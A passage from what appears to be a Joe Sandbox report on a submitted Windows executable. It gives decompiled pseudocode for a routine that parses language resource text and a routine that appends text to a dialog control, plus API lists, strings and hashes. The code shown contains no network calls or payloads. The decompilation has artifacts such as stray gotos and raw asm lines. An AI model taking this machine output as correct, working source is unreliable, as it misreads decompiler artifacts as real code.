								__eflags = _t468[0x12];
								_t462 = _t372;
								_t392 = _t372;
								_t468[0xc] = _t462;
								_t268 = _t372;
								 *(_t468 - 0x40) = _t372;
								_t468[0xb] = _t392;
								_t468[0x15] = _t268;
								_t468[0xa] = 0x20;
								_t468[0xf] = 9;
								if(_t468[0x12] <= 0) {
									L109:
									__eflags =  *(_t468 - 0x40);
									if( *(_t468 - 0x40) == 0) {
										_t463 = _t468[0xe];
										L122:
										L00B83E2E(_t468[0x13]);
										L00B83E2E(_t468[0x11]);
										_t451 =  &(_t463[0x3c]);
										__eflags = _t463[0x2c] - _t372;
										if(_t463[0x2c] <= _t372) {
											L124:
											 *0xba10b8 = _t463[0x28];
											E00B86310(_t372,  *_t451, _t463[0x40], 4, E00B6D7A0);
											E00B86310(_t372, _t463[0x50], _t463[0x54], 4, E00B6D7D0);
											goto L125;
										} else {
											goto L123;
										}
										do {
											L123:
											E00B6E261(_t451, _t443, _t372);
											E00B6E261( &(_t463[0x50]), _t443, _t372);
											_t372 = _t372 + 1;
											__eflags = _t372 - _t463[0x2c];
										} while (_t372 < _t463[0x2c]);
										goto L124;
									}
									_t468[7] = _t392;
									_t468[8] = E00B88CCE(_t372, _t462, _t468 - 0x40);
									_pop(_t397);
									__eflags = _t462;
									if(_t462 == 0) {
										L118:
										 *(_t450 + _t462 * 2) = 0;
										_t279 = 0x22;
										__eflags =  *_t450 - _t279;
										if( *_t450 == _t279) {
											__eflags = _t450;
										}
										_t468[9] = E00B87625(_t372, _t450);
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t463 = _t468[0xe];
										E00B6E27C( &(_t463[0x28]), _t443, _t397, _t397, _t450);
										goto L122;
									}
									_t212 = _t462 - 1; // -1
									_t283 = _t450 + _t212 * 2;
									_t443 = 0x20;
									do {
										_t397 =  *_t283 & 0x0000ffff;
										__eflags = _t397 - _t443;
										if(_t397 == _t443) {
											goto L114;
										}
										__eflags = _t397 - _t468[0xf];
										if(_t397 != _t468[0xf]) {
											break;
										}
										L114:
										_t397 = 0;
										 *_t283 = 0;
										_t283 = _t283 - 2;
										_t462 = _t462 - 1;
										__eflags = _t462;
									} while (_t462 != 0);
									__eflags = _t462;
									if(_t462 != 0) {
										_t284 = 0x22;
										__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t284;
										if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t284) {
											__eflags = 0;
											 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
										}
									}
									goto L118;
								}
								_t468[6] = 0xd;
								_t468[5] = 0xa;
								do {
									_t399 = _t468[0x13];
									__eflags = _t268;
									if(_t268 == 0) {
										L75:
										_t443 =  *(_t399 + _t268 * 2) & 0x0000ffff;
										_t268 = _t268 + 1;
										_t468[0x15] = _t268;
										__eflags = _t443;
										if(_t443 == 0) {
											break;
										}
										__eflags = _t443 - _t468[4];
										if(_t443 != _t468[4]) {
											_t400 = 0xd;
											__eflags = _t443 - _t400;
											if(_t443 == _t400) {
												L93:
												__eflags =  *(_t468 - 0x40);
												if( *(_t468 - 0x40) == 0) {
													L105:
													 *(_t468 - 0x40) = _t372;
													_t462 = _t372;
													_t468[0xb] = _t372;
													L106:
													_t468[0xc] = _t462;
													goto L107;
												}
												_t468[7] = _t468[0xb];
												_t468[8] = E00B88CCE(_t372, _t462, _t468 - 0x40);
												_pop(_t401);
												__eflags = _t462;
												if(_t462 == 0) {
													L102:
													 *(_t450 + _t462 * 2) = 0;
													_t290 = 0x22;
													__eflags =  *_t450 - _t290;
													if( *_t450 == _t290) {
														__eflags = _t450;
													}
													_t468[9] = E00B87625(_t372, _t450);
													asm("movsd");
													asm("movsd");
													asm("movsd");
													E00B6E27C( &(_t468[0xe][0x28]), _t443, _t401, _t401, _t450);
													_t450 = _t468[0x11];
													_t268 = _t468[0x15];
													goto L105;
												}
												_t185 = _t462 - 1; // -1
												_t294 = _t450 + _t185 * 2;
												_t443 = 0x20;
												do {
													_t401 =  *_t294 & 0x0000ffff;
													__eflags = _t401 - _t443;
													if(_t401 == _t443) {
														goto L98;
													}
													__eflags = _t401 - _t468[0xf];
													if(_t401 != _t468[0xf]) {
														break;
													}
													L98:
													_t401 = 0;
													 *_t294 = 0;
													_t294 = _t294 - 2;
													_t462 = _t462 - 1;
													__eflags = _t462;
												} while (_t462 != 0);
												__eflags = _t462;
												if(_t462 != 0) {
													_t295 = 0x22;
													__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t295;
													if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t295) {
														__eflags = 0;
														 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
													}
												}
												goto L102;
											}
											_t404 = 0xa;
											__eflags = _t443 - _t404;
											if(_t443 == _t404) {
												goto L93;
											}
											__eflags = _t462 - 0x10000;
											if(_t462 >= 0x10000) {
												goto L107;
											}
											L92:
											 *(_t450 + _t462 * 2) = _t443;
											_t462 = _t462 + 1;
											goto L106;
										}
										__eflags = _t462 - 0x10000;
										if(_t462 >= 0x10000) {
											goto L107;
										}
										_t406 = ( *(_t399 + _t268 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t406;
										if(_t406 == 0) {
											_push(0x22);
											L88:
											_pop(_t407);
											 *(_t450 + _t462 * 2) = _t407;
											_t268 = _t268 + 1;
											_t468[0x15] = _t268;
											_t462 = _t462 + 1;
											goto L106;
										}
										_t410 = _t406 - 0x3a;
										__eflags = _t410;
										if(_t410 == 0) {
											_push(0x5c);
											goto L88;
										}
										_t411 = _t410 - 0x12;
										__eflags = _t411;
										if(_t411 == 0) {
											_push(0xa);
											goto L88;
										}
										_t412 = _t411 - 4;
										__eflags = _t412;
										if(_t412 == 0) {
											_push(0xd);
											goto L88;
										}
										__eflags = _t412 != 0;
										if(_t412 != 0) {
											goto L92;
										}
										_push(9);
										goto L88;
									}
									_t444 =  *(_t399 + _t268 * 2 - 2) & 0x0000ffff;
									__eflags = _t444 - _t468[6];
									if(_t444 == _t468[6]) {
										L42:
										_t443 = 0x3a;
										__eflags =  *(_t399 + _t268 * 2) - _t443;
										if( *(_t399 + _t268 * 2) != _t443) {
											L65:
											_t468[0x10] = _t399 + _t268 * 2;
											_t299 = E00B7045B( *(_t399 + _t268 * 2) & 0x0000ffff);
											__eflags = _t299;
											if(_t299 == 0) {
												L74:
												_t399 = _t468[0x13];
												_t268 = _t468[0x15];
												goto L75;
											}
											E00B70602(_t468 - 0x298, _t468[0x10], 0x64);
											_t303 = E00B86105(_t468 - 0x298, L" \t,");
											_t468[0x10] = _t303;
											__eflags = _t303;
											if(_t303 == 0) {
												goto L74;
											}
											 *_t303 = 0;
											E00B71DA7(_t468 - 0x298, _t468 - 0x16c, 0x64);
											E00B705A7(_t468 - 0xa4, _t468 - 0x108, 0x64);
											E00B70580(__eflags, _t468 - 0xa4, _t468 - 0x16c, 0x64);
											E00B705A7(_t468 - 0x40, _t468 - 0xa4, 0x32);
											_t318 = E00B86159(_t372, 0, _t443, _t462, _t468 - 0xa4,  *(_t468[0xe]), _t468[0xe][4], 4, E00B6D780);
											_t473 = _t473 + 0x14;
											__eflags = _t318;
											if(_t318 != 0) {
												_t322 =  *_t318 * 0xc;
												__eflags = _t322;
												_t156 = _t322 + 0xb9e270; // 0x28b64ee0
												_t468[0xb] =  *_t156;
											}
											_t268 =  &(( &(_t468[0x15][1]))[_t468[0x10] - _t468 - 0x298 >> 1]);
											__eflags = _t268;
											_t421 = _t468[0x13];
											while(1) {
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												L71:
												__eflags = _t443 - _t468[0xf];
												if(_t443 != _t468[0xf]) {
													_t468[0x15] = _t268;
													goto L107;
												}
												L72:
												_t268 = _t268 + 1;
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												goto L71;
											}
										}
										_t453 = _t468[0x15];
										_t324 = _t268 | 0xffffffff;
										__eflags = _t324;
										_t466 = _t372;
										_t468[0xd] = _t324;
										_t374 = _t468[0x13];
										 *_t468 = L"STRINGS";
										_t468[1] = L"DIALOG";
										_t468[2] = L"MENU";
										_t468[3] = L"DIRECTION";
										do {
											_t468[0x10] = E00B83E13(_t468[_t466]);
											_t326 = E00B86088( &(_t374[2]) + _t453 * 2, _t468[_t466], _t325);
											_t473 = _t473 + 0x10;
											__eflags = _t326;
											if(_t326 != 0) {
												L47:
												_t424 = _t468[0xd];
												goto L48;
											}
											_t346 =  &(_t468[0x10][_t453]);
											_t430 = 0x20;
											__eflags = _t374[2 + _t346 * 2] - _t430;
											if(_t374[2 + _t346 * 2] > _t430) {
												goto L47;
											}
											_t424 = _t466;
											_t453 = _t346 + 1;
											_t468[0xd] = _t424;
											L48:
											_t466 = _t466 + 1;
											__eflags = _t466 - 4;
										} while (_t466 < 4);
										_t462 = _t468[0xc];
										_t372 = 0;
										_t468[0x15] = _t453;
										_t450 = _t468[0x11];
										__eflags = _t424;
										if(__eflags != 0) {
											_t268 = _t468[0x15];
											_t399 = _t468[0x13];
											if(__eflags <= 0) {
												goto L65;
											} else {
												goto L53;
											}
											while(1) {
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												L54:
												__eflags = _t455 - _t468[0xf];
												if(_t455 != _t468[0xf]) {
													_t468[0x15] = _t268;
													_t425 = _t372;
													_t456 = 0x20;
													__eflags = ( *_t443 & 0x0000ffff) - _t456;
													_t468[0x10] = _t372;
													_t450 = _t468[0x11];
													if(( *_t443 & 0x0000ffff) <= _t456) {
														L60:
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = 0;
														E00B71DA7(_t468 - 0x1d0, _t468 - 0xa4, 0x64);
														_t468[0x15] =  &(_t468[0x15][_t468[0x10]]);
														_t333 = _t468[0xd];
														__eflags = _t333 - 3;
														if(_t333 != 3) {
															__eflags = _t333 - 1;
															_t334 = "$%s:";
															if(_t333 != 1) {
																_t334 = "@%s:";
															}
															E00B6E5B1(_t468 - 0x108, 0x64, _t334, _t468 - 0xa4);
															_t473 = _t473 + 0x10;
														} else {
															_t338 = E00B83E49(_t468 - 0x1d0, _t468 - 0x1d0, L"RTL");
															asm("sbb al, al");
															_t468[0xe][0x64] =  ~_t338 + 1;
														}
														L51:
														_t268 = _t468[0x15];
														goto L107;
													} else {
														goto L57;
													}
													while(1) {
														L57:
														__eflags = _t425 - 0x63;
														if(_t425 >= 0x63) {
															break;
														}
														_t341 =  *_t443;
														_t443 = _t443 + 2;
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = _t341;
														_t425 = _t425 + 1;
														_t342 = 0x20;
														__eflags =  *_t443 - _t342;
														if( *_t443 > _t342) {
															continue;
														}
														break;
													}
													_t468[0x10] = _t425;
													goto L60;
												}
												L55:
												_t268 = _t268 + 1;
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												goto L54;
											}
										}
										E00B705A7(_t468 - 0x108, 0xb939d0, 0x64);
										goto L51;
									}
									__eflags = _t444 - _t468[5];
									if(_t444 != _t468[5]) {
										goto L75;
									}
									goto L42;
									L107:
									__eflags = _t268 - _t468[0x12];
								} while (_t268 < _t468[0x12]);
								_t392 = _t468[0xb];
								goto L109;
							} else {
								L00B83E2E(_t461);
								goto L125;
							}
						}
						_t389 = _t385 >> 1;
						_t468[0x12] = _t389;
						goto L33;
					} else {
						goto L5;
					}
					goto L7;
					L5:
					E00B6E261(_t459, _t443, _t447);
					E00B6E261(_t459 + 0x14, _t443, _t447);
					_t447 = _t447 + 1;
					_t478 = _t447 -  *0xb9e720; // 0x64
					if(_t478 < 0) {
						goto L5;
					} else {
						_t372 = 0;
						goto L7;
					}
				}
			}

0x00b6da67
0x00b6da68
0x00b6da70
0x00b6da7a
0x00b6da84
0x00b6da85
0x00b6da86
0x00b6da89
0x00b6da8b
0x00b6da8e
0x00b6da91
0x00b6da97
0x00b6da99
0x00b6da9c
0x00b6daa2
0x00b6dade
0x00b6daa4
0x00b6daac
0x00b6dac4
0x00b6dace
0x00b6dace
0x00b6dae9
0x00b6daee
0x00b6daf6
0x00b6daf9
0x00b6db07
0x00b6e242
0x00b6e248
0x00b6e252
0x00b6e25a
0x00b6e25e
0x00b6db0d
0x00b6db0d
0x00b6db0f
0x00b6db15
0x00b6db33
0x00b6db3f
0x00b6db51
0x00b6db56
0x00b6db59
0x00b6db5c
0x00b6db5f
0x00b6db62
0x00b6db71
0x00b6db76
0x00b6db8b
0x00b6db90
0x00b6db93
0x00b6db95
0x00b6db95
0x00b6db98
0x00b6db9d
0x00b6dc5a
0x00b6dc5a
0x00b6dc5d
0x00b6dc6e
0x00b6dc76
0x00b6dc77
0x00b6dc7a
0x00b6dc7f
0x00000000
0x00000000
0x00b6dc85
0x00b6dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6dbb7
0x00b6dbc7
0x00b6dbcc
0x00b6dbd1
0x00b6dc52
0x00b6dc52
0x00b6dc55
0x00000000
0x00b6dbd3
0x00b6dbd3
0x00b6dbd3
0x00b6dbd6
0x00b6dbd8
0x00b6dbe1
0x00b6dc0c
0x00b6dc14
0x00b6dc40
0x00b6dc40
0x00b6dc44
0x00000000
0x00b6dc46
0x00b6dc46
0x00b6dba3
0x00b6dbab
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6dbab
0x00b6dc20
0x00b6dc30
0x00b6dc35
0x00b6dc3a
0x00000000
0x00000000
0x00000000
0x00b6dc3a
0x00b6dc14
0x00b6dbe9
0x00b6dbef
0x00b6dc00
0x00b6dc05
0x00b6dc0a
0x00b6dc4e
0x00000000
0x00b6dc4e
0x00b6dc0a
0x00000000
0x00b6dbef
0x00b6dc97
0x00b6dc9a
0x00b6dc9f
0x00b6dca9
0x00b6dcab
0x00b6dcaf
0x00b6dcb1
0x00000000
0x00000000
0x00b6dcc3
0x00b6dcc8
0x00b6dccc
0x00b6dcce
0x00b6dcd1
0x00b6dce1
0x00b6dce7
0x00b6dcea
0x00b6dcec
0x00000000
0x00000000
0x00b6dcf8
0x00b6dcfe
0x00b6dd04
0x00b6dd0a
0x00b6dd0d
0x00b6dd0f
0x00b6dd12
0x00b6dd12
0x00b6dd17
0x00b6dd19
0x00b6dd1b
0x00b6dd1b
0x00b6dd21
0x00b6dd31
0x00b6dd36
0x00b6dd40
0x00b6dd42
0x00b6dd46
0x00b6dd48
0x00b6dd56
0x00b6dd5a
0x00b6dd5c
0x00b6dd5e
0x00b6dd61
0x00b6dd63
0x00b6dd66
0x00b6dd69
0x00b6dd6c
0x00b6dd73
0x00b6dd7a
0x00b6e15c
0x00b6e15c
0x00b6e160
0x00b6e1e0
0x00b6e1e3
0x00b6e1e6
0x00b6e1ee
0x00b6e1f3
0x00b6e1f8
0x00b6e1fb
0x00b6e214
0x00b6e221
0x00b6e228
0x00b6e23a
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6e1fd
0x00b6e1fd
0x00b6e200
0x00b6e209
0x00b6e20e
0x00b6e20f
0x00b6e20f
0x00000000
0x00b6e1fd
0x00b6e165
0x00b6e16e
0x00b6e171
0x00b6e172
0x00b6e174
0x00b6e1af
0x00b6e1b1
0x00b6e1b7
0x00b6e1b8
0x00b6e1bb
0x00b6e1bd
0x00b6e1bd
0x00b6e1ca
0x00b6e1d0
0x00b6e1d1
0x00b6e1d2
0x00b6e1d3
0x00b6e1d9
0x00000000
0x00b6e1d9
0x00b6e176
0x00b6e17b
0x00b6e17e
0x00b6e17f
0x00b6e17f
0x00b6e182
0x00b6e185
0x00000000
0x00000000
0x00b6e187
0x00b6e18b
0x00000000
0x00000000
0x00b6e18d
0x00b6e18d
0x00b6e18f
0x00b6e192
0x00b6e195
0x00b6e195
0x00b6e195
0x00b6e19a
0x00b6e19c
0x00b6e1a0
0x00b6e1a1
0x00b6e1a6
0x00b6e1a8
0x00b6e1aa
0x00b6e1aa
0x00b6e1a6
0x00000000
0x00b6e19c
0x00b6dd80
0x00b6dd87
0x00b6dd8e
0x00b6dd8e
0x00b6dd91
0x00b6dd93
0x00b6e02a
0x00b6e02a
0x00b6e02e
0x00b6e02f
0x00b6e032
0x00b6e035
0x00000000
0x00000000
0x00b6e03b
0x00b6e03f
0x00b6e092
0x00b6e093
0x00b6e096
0x00b6e0b6
0x00b6e0b6
0x00b6e0ba
0x00b6e145
0x00b6e145
0x00b6e148
0x00b6e14a
0x00b6e14d
0x00b6e14d
0x00000000
0x00b6e14d
0x00b6e0c3
0x00b6e0cf
0x00b6e0d2
0x00b6e0d3
0x00b6e0d5
0x00b6e110
0x00b6e112
0x00b6e118
0x00b6e119
0x00b6e11c
0x00b6e11e
0x00b6e11e
0x00b6e131
0x00b6e137
0x00b6e138
0x00b6e139
0x00b6e13a
0x00b6e13f
0x00b6e142
0x00000000
0x00b6e142
0x00b6e0d7
0x00b6e0dc
0x00b6e0df
0x00b6e0e0
0x00b6e0e0
0x00b6e0e3
0x00b6e0e6
0x00000000
0x00000000
0x00b6e0e8
0x00b6e0ec
0x00000000
0x00000000
0x00b6e0ee
0x00b6e0ee
0x00b6e0f0
0x00b6e0f3
0x00b6e0f6
0x00b6e0f6
0x00b6e0f6
0x00b6e0fb
0x00b6e0fd
0x00b6e101
0x00b6e102
0x00b6e107
0x00b6e109
0x00b6e10b
0x00b6e10b
0x00b6e107
0x00000000
0x00b6e0fd
0x00b6e09a
0x00b6e09b
0x00b6e09e
0x00000000
0x00000000
0x00b6e0a0
0x00b6e0a6
0x00000000
0x00000000
0x00b6e0ac
0x00b6e0ac
0x00b6e0b0
0x00000000
0x00b6e0b0
0x00b6e041
0x00b6e047
0x00000000
0x00000000
0x00b6e051
0x00b6e051
0x00b6e054
0x00b6e07b
0x00b6e07d
0x00b6e07d
0x00b6e07e
0x00b6e085
0x00b6e086
0x00b6e089
0x00000000
0x00b6e089
0x00b6e056
0x00b6e056
0x00b6e059
0x00b6e077
0x00000000
0x00b6e077
0x00b6e05b
0x00b6e05b
0x00b6e05e
0x00b6e073
0x00000000
0x00b6e073
0x00b6e060
0x00b6e060
0x00b6e063
0x00b6e06f
0x00000000
0x00b6e06f
0x00b6e066
0x00b6e069
0x00000000
0x00000000
0x00b6e06b
0x00000000
0x00b6e06b
0x00b6dd99
0x00b6dd9e
0x00b6dda2
0x00b6ddae
0x00b6ddb0
0x00b6ddb1
0x00b6ddb5
0x00b6df29
0x00b6df2c
0x00b6df33
0x00b6df38
0x00b6df3a
0x00b6e024
0x00b6e024
0x00b6e027
0x00000000
0x00b6e027
0x00b6df4c
0x00b6df5d
0x00b6df62
0x00b6df67
0x00b6df69
0x00000000
0x00000000
0x00b6df71
0x00b6df84
0x00b6df99
0x00b6dfae
0x00b6dfc0
0x00b6dfdb
0x00b6dfe0
0x00b6dfe3
0x00b6dfe5
0x00b6dfe7
0x00b6dfe7
0x00b6dfea
0x00b6dff0
0x00b6dff0
0x00b6e004
0x00b6e004
0x00b6e006
0x00b6e009
0x00b6e009
0x00b6e00d
0x00b6e011
0x00000000
0x00000000
0x00b6e013
0x00b6e013
0x00b6e017
0x00b6e01c
0x00000000
0x00b6e01c
0x00b6e019
0x00b6e019
0x00b6e009
0x00b6e00d
0x00b6e011
0x00000000
0x00000000
0x00000000
0x00b6e011
0x00b6e009
0x00b6ddbb
0x00b6ddbe
0x00b6ddbe
0x00b6ddc1
0x00b6ddc3
0x00b6ddc6
0x00b6ddc9
0x00b6ddd0
0x00b6ddd7
0x00b6ddde
0x00b6dde5
0x00b6ddf6
0x00b6ddfd
0x00b6de02
0x00b6de05
0x00b6de07
0x00b6de22
0x00b6de22
0x00000000
0x00b6de22
0x00b6de0c
0x00b6de10
0x00b6de11
0x00b6de16
0x00000000
0x00000000
0x00b6de18
0x00b6de1a
0x00b6de1d
0x00b6de25
0x00b6de25
0x00b6de26
0x00b6de26
0x00b6de2b
0x00b6de2e
0x00b6de30
0x00b6de33
0x00b6de36
0x00b6de38
0x00b6de55
0x00b6de58
0x00b6de5b
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6de61
0x00b6de61
0x00b6de61
0x00b6de64
0x00b6de67
0x00b6de6b
0x00000000
0x00000000
0x00b6de6d
0x00b6de6d
0x00b6de71
0x00b6de78
0x00b6de7b
0x00b6de80
0x00b6de81
0x00b6de84
0x00b6de87
0x00b6de8a
0x00b6deab
0x00b6dead
0x00b6dec5
0x00b6decd
0x00b6ded0
0x00b6ded3
0x00b6ded6
0x00b6defc
0x00b6deff
0x00b6df04
0x00b6df06
0x00b6df06
0x00b6df1c
0x00b6df21
0x00b6ded8
0x00b6dee4
0x00b6def0
0x00b6def4
0x00b6def4
0x00b6de4d
0x00b6de4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6de8c
0x00b6de8c
0x00b6de8c
0x00b6de8f
0x00000000
0x00000000
0x00b6de91
0x00b6de94
0x00b6de97
0x00b6de9f
0x00b6dea2
0x00b6dea3
0x00b6dea6
0x00000000
0x00000000
0x00000000
0x00b6dea6
0x00b6dea8
0x00000000
0x00b6dea8
0x00b6de73
0x00b6de73
0x00b6de61
0x00b6de61
0x00b6de64
0x00b6de67
0x00b6de6b
0x00000000
0x00000000
0x00000000
0x00b6de6b
0x00b6de61
0x00b6de48
0x00000000
0x00b6de48
0x00b6dda4
0x00b6dda8
0x00000000
0x00000000
0x00000000
0x00b6e150
0x00b6e150
0x00b6e150
0x00b6e159
0x00000000
0x00b6dd4a
0x00b6dd4b
0x00000000
0x00b6dd50
0x00b6dd48
0x00b6dcd3
0x00b6dcd5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6db17
0x00b6db1a
0x00b6db23
0x00b6db28
0x00b6db29
0x00b6db2f
0x00000000
0x00b6db31
0x00b6db31
0x00000000
0x00b6db31
0x00b6db2f

APIs

__EH_prolog.LIBCMT ref: 00B6DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B6DAAC

Part of subcall function 00B6C29A: _wcslen.LIBCMT ref: 00B6C2A2

Part of subcall function 00B705DA: _wcslen.LIBCMT ref: 00B705E0

Part of subcall function 00B71B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B6BAE9,00000000,?,?,?,0001042A), ref: 00B71BA0

_wcslen.LIBCMT ref: 00B6DDE9
__fprintf_l.LIBCMT ref: 00B6DF1C

Strings

RTL, xrefs: 00B6DEDE
$%s:, xrefs: 00B6DEFF
, xrefs: 00B6DD6C
*messages***, xrefs: 00B6DBFA
,, xrefs: 00B6DF57
*messages***, xrefs: 00B6DBC1
a, xrefs: 00B6DC16
R, xrefs: 00B6DC0C
@%s:, xrefs: 00B6DF06, 00B6DF12

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: d63f02f68cf4a10d4ad2c6d1e7bcb770282abbfc6e4c44364acf05948911462b
Instruction ID: 447233987ebc64f37925fe98167bfff63f40979fbbb594d8524ee130d1c26987
Opcode Fuzzy Hash: d63f02f68cf4a10d4ad2c6d1e7bcb770282abbfc6e4c44364acf05948911462b
Instruction Fuzzy Hash: 4832E176A00218DBCF24EF68C882BEA77E5FF15700F4045AAF915A7291EB79DD84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B7D4D4() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E00B7B568(); // executed
				_t46 = GetDlgItem( *0xba8458, 0x68);
				_t49 =  *0xba8463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xba8440; // 0x0
					E00B79285(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0xb935f4);
					 *0xba8463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}

0x00b7d4db
0x00b7d4f5
0x00b7d4fa
0x00b7d500
0x00b7d502
0x00b7d508
0x00b7d510
0x00b7d51b
0x00b7d529
0x00b7d52f
0x00b7d52f
0x00b7d53f
0x00b7d549
0x00b7d559
0x00b7d561
0x00b7d565
0x00b7d56a
0x00b7d570
0x00b7d57b
0x00b7d585
0x00b7d58d
0x00b7d58d
0x00b7d59d
0x00b7d5ab
0x00b7d5ba
0x00b7d5c2
0x00b7d5d0
0x00b7d5e1
0x00b7d5e1
0x00b7d5fd

APIs

Part of subcall function 00B7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7B579
Part of subcall function 00B7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7B58A
Part of subcall function 00B7B568: IsDialogMessageW.USER32(0001042A,?), ref: 00B7B59E
Part of subcall function 00B7B568: TranslateMessage.USER32(?), ref: 00B7B5AC
Part of subcall function 00B7B568: DispatchMessageW.USER32(?), ref: 00B7B5B6

GetDlgItem.USER32(00000068,00BBFCB8), ref: 00B7D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00B7AF07,00000001,?,?,00B7B7B9,00B9506C,00BBFCB8,00BBFCB8,00001000,00000000,00000000), ref: 00B7D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B7D51B
SendMessageW.USER32(00000000,000000C2,00000000,00B935F4), ref: 00B7D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B7D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B7D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B7D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B7D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B7D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B7D5E1
SendMessageW.USER32(00000000,000000C2,00000000,00B943F4), ref: 00B7D5F0

Strings

\, xrefs: 00B7D549

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 1223ab7aec4d280fc666eb12d8eca911347e4a21f90b44ea4bbfa8d6a219cb4e
Instruction ID: 45347909cf4326392659c846c361adb03f29292d13d1b86db4a65e6aa07523f9
Opcode Fuzzy Hash: 1223ab7aec4d280fc666eb12d8eca911347e4a21f90b44ea4bbfa8d6a219cb4e
